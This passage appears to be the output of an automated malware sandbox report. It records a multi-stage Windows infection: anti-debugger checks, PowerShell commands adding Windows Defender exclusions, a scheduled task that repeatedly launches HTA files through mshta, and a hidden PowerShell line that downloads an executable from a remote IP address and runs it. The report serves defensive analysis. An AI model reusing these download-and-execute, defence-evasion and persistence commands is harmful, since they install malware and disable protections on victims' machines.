                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exe | Thread information set: HideFromDebugger
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: gbdyllo
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: procmon_window_class
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: ollydbg
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File opened: NTICE
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File opened: SICE
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File opened: SIWVID
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe | Code function: 5_2_054C0CA7 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe | Code function: 3_2_6C53AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe | Code function: 5_2_00EA652B mov eax, dword ptr fs:[00000030h]
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe | Code function: 5_2_00EAA302 mov eax, dword ptr fs:[00000030h]
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00F8A302 mov eax, dword ptr fs:[00000030h]
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00F8652B mov eax, dword ptr fs:[00000030h]
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe | Process token adjusted: Debug
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe | Code function: 3_2_6C53B12A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe | Memory protected: page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: Yara match | File source: amsi64_6656.amsi.csv, type: OTHER
                                    Source: Yara match | File source: amsi64_7380.amsi.csv, type: OTHER
                                    Source: Yara match | File source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: mshta.exe PID: 3388, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe | Memory written: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe base: 400000 value starts with: 4D5A
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe "C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\wOXcVegx\jyidkjkfhjawd.exe "C:\wOXcVegx\jyidkjkfhjawd.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C584760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,3_2_6C584760
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C461C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,3_2_6C461C30
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2213989186.0000000001312000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Program Manager
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe, 456YTTQ213T2RO9QAEYSNNZDL.exe, 00000005.00000002.1876549211.00000000010AD000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, skotes.exe, 00000006.00000002.1915902922.000000000118D000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: lProgram Manager
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C53AE71 cpuid 3_2_6C53AE71
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027567001\95ba65f98f.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027572001\568p2nk.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exe, Queries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe, Queries volume information: unknown VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\mshta.exe, Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exe, Queries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe, Code function: 3_2_6C53A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_6C53A8DC
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe, Code function: 3_2_6C488390 NSS_GetVersion,3_2_6C488390
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: 64252d274d.exe, 00000024.00000003.2465555446.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2568911959.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2462258153.0000000001533000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2510983657.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2511360727.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2466909262.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2536453720.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4862231655.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898372977.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
